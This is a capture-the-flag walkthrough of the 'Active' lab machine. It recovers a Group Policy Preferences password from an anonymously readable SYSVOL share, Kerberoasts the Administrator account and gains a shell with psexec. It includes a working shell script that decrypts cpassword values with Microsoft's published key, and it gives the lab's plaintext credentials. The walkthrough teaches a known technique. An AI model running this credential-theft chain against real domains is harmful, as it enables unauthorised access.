Active — HTB Walkthrough
ENUMERATION
Nmap scan
LDAP Enumeration
Enum4Linux
Logging in with smbclient directly doesn't work (we have no credentials yet), so we list the shares and find that the Replication share, a mirror of the SYSVOL policy tree, can be read anonymously.
Inside it, the Group Policy Preferences file Groups.xml can carry an account password in its cpassword attribute if an admin set one and left it there. Let's pull the file down to our machine and look at its contents.
We get the cpassword for SVC_TGS (a name that suggests a ticket-granting-service account). Passing it to WinRM as if it were an NTLM hash did not work, and it never will: the value is not a hash but AES-encrypted, with a key Microsoft published long ago (MS14-025), so it simply needs to be decrypted.
1) gpp-decrypt, which ships with Kali
OR
2) Get-GPPPassword.ps1 (PowerSploit) on Windows
I used gpp-decrypt on Kali:
Username: SVC_TGS, Password: GPPstillStandingStrong2k18
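To show what gpp-decrypt actually does, here is an added example that is not part of the original walkthrough: it builds a constructed Groups.xml for SVC_TGS whose cpassword is produced the same way Group Policy Preferences produces it, then extracts and decrypts that value with openssl using the AES-256 key Microsoft published. It assumes a POSIX shell with openssl, iconv and GNU or busybox base64; the sample file, its minimal attributes and the helper names are mine, not anything found on the box.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): how a GPP cpassword is
# built and how gpp-decrypt recovers it, plus pulling the attribute out of a
# Groups.xml. Needs openssl, iconv and GNU/busybox base64. The Groups.xml
# written below is a constructed stand-in for the file found on the box.
set -eu

# AES-256 key Microsoft published for Group Policy Preferences passwords.
GPP_KEY=4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b
# GPP encrypts with an all-zero IV.
ZERO_IV=00000000000000000000000000000000

# Encrypt the way GPP stores it: UTF-16LE -> AES-256-CBC (PKCS#7) -> base64
# with the trailing '=' padding stripped. Only used here to build the sample.
gpp_encrypt() {
    printf '%s' "$1" \
      | iconv -f UTF-8 -t UTF-16LE \
      | openssl enc -aes-256-cbc -K "$GPP_KEY" -iv "$ZERO_IV" \
      | base64 -w0 \
      | sed 's/=*$//'
}

# Reverse of the above; this is all gpp-decrypt does.
gpp_decrypt() {
    b64=$1
    pad=$(( (4 - ${#b64} % 4) % 4 ))      # restore the base64 padding GPP drops
    while [ "$pad" -gt 0 ]; do b64="$b64="; pad=$((pad - 1)); done
    printf '%s' "$b64" \
      | base64 -d \
      | openssl enc -d -aes-256-cbc -K "$GPP_KEY" -iv "$ZERO_IV" \
      | iconv -f UTF-16LE -t UTF-8
}

# Print "user plaintext" for every <Properties> element carrying a cpassword.
extract_creds() {
    grep -o '<Properties [^>]*>' "$1" | while read -r props; do
        cpw=$(printf '%s' "$props" | sed -n 's/.*cpassword="\([^"]*\)".*/\1/p')
        if [ -n "$cpw" ]; then
            user=$(printf '%s' "$props" | sed -n 's/.*userName="\([^"]*\)".*/\1/p')
            printf '%s %s\n' "$user" "$(gpp_decrypt "$cpw")"
        fi
    done
}

# Constructed sample file: same account and password as on the box, every
# other attribute left out.
SAMPLE_XML=$(mktemp)
trap 'rm -f "$SAMPLE_XML"' EXIT
CPASS=$(gpp_encrypt 'GPPstillStandingStrong2k18')
cat > "$SAMPLE_XML" <<EOF
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\\SVC_TGS">
    <Properties action="U" cpassword="$CPASS" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
EOF

extract_creds "$SAMPLE_XML"
# -> active.htb\SVC_TGS GPPstillStandingStrong2k18
```

Real Groups.xml files carry more attributes (clsid, changed, uid and so on) and may hold several Properties entries; the loop handles any number of them. The same cpassword encoding appears in other preference files under SYSVOL, such as Services.xml, ScheduledTasks.xml and Drives.xml, so it is worth grepping the whole Policies tree for `cpassword=` rather than stopping at Groups.xml.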
Logging in over SMB as SVC_TGS with that password works.
That gets us user.txt.
EXPLOITATION
As the name hints, SVC_TGS is a service account tied to ticket-granting, and with any valid domain account we can request service tickets for every user that has an SPN registered. So why not just Kerberoast? The request returns a TGS ticket for the Administrator account, which can be cracked offline.
Let's crack the Administrator ticket hash we got with john.
The Administrator password is Ticketmaster1968.
I used psexec.py from impacket with those credentials to get a shell.
ROOTED!!!!